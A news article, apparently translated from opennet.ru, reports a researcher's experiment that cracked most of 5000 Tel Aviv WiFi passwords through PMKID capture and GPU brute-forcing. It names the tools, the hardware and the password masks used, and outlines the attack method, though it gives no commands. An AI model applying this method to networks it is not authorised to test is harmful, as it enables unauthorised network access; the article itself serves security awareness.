Israeli security researcher Ido Horvich (Ido Hoorvitch Tel Aviv) published the results of an experiment to study the strength of passwords used to access wireless networks. In the course of a study on intercepted frames with PMKID identifiers, it was possible to guess passwords for access to 3663 out of 5000 (73%) studied wireless networks in Tel Aviv. As a result, it was concluded that most owners of wireless networks set weak passwords that are subject to selection by hashes, and their wireless networks can be attacked using typical hashcat, hcxtools and hcxdumptool utilities.
Ido used an Ubuntu Linux laptop to sniff wireless network packets, put it in his backpack and wandered around the city until he managed to intercept frames with PMKID (Pairwise Master Key Identifier) ββidentifiers from five thousand different wireless networks. After that, he used a computer with 8 NVIDIA QUADRO RTX 8000 48GB GPUs to guess passwords using hashes extracted from the PMKID ID. The selection performance on this server was almost 7 million hashes per second. For comparison, on a typical laptop, the performance is about 200 hashes per second, which is enough to guess a single 10-digit password in about 9 minutes.
To speed up the selection, the search was limited to sequences that included only 8 lowercase letters, as well as 8, 9 or 10 digits. This restriction was enough to determine passwords for 3663 out of 5000 networks. The most popular passwords were 10 digits, which were used in 2349 networks. Passwords of 8 digits were used in 596 networks, 9 in 368, and passwords of 8 letters in lower case in 320. Repeated selection using the rockyou.txt dictionary, 133 MB in size, allowed 900 passwords to be guessed at once.
It is assumed that the situation with the strength of passwords in wireless networks in other cities and countries is approximately the same, and most passwords can be guessed in a few hours and spending about $50 on a wireless card that supports the air monitoring mode (the ALFA Network AWUS036ACH card was used in the experiment). The PMKID-based attack is applicable only to access points that support roaming, but as practice has shown, most manufacturers do not disable it.
The attack used a typical method for hacking wireless networks with WPA2, which has been known since 2018. Unlike the classical method, which requires the interception of handshake frames during the connection of the user, the method based on the interception of PMKID is not tied to the connection of a new user to the network and can be performed at any time. To obtain data sufficient to start password guessing, it is only necessary to intercept one frame with the PMKID identifier. Such frames can be received both in passive mode, monitoring roaming activity, and forced to initiate the transmission of frames from PMKID to the air by sending an authentication request to the access point.
The PMKID is a hash generated using a password, the access point's MAC address, the client's MAC address, and the wireless network name (SSID). The last three parameters (MAC AP, MAC Station, and SSID) are known from the outset, allowing a dictionary brute-force method to determine the password, similar to how user passwords in a system can be guessed if their hash is leaked. Thus, the security of entering the wireless network depends entirely on the strength of the password set.
Source: opennet.ru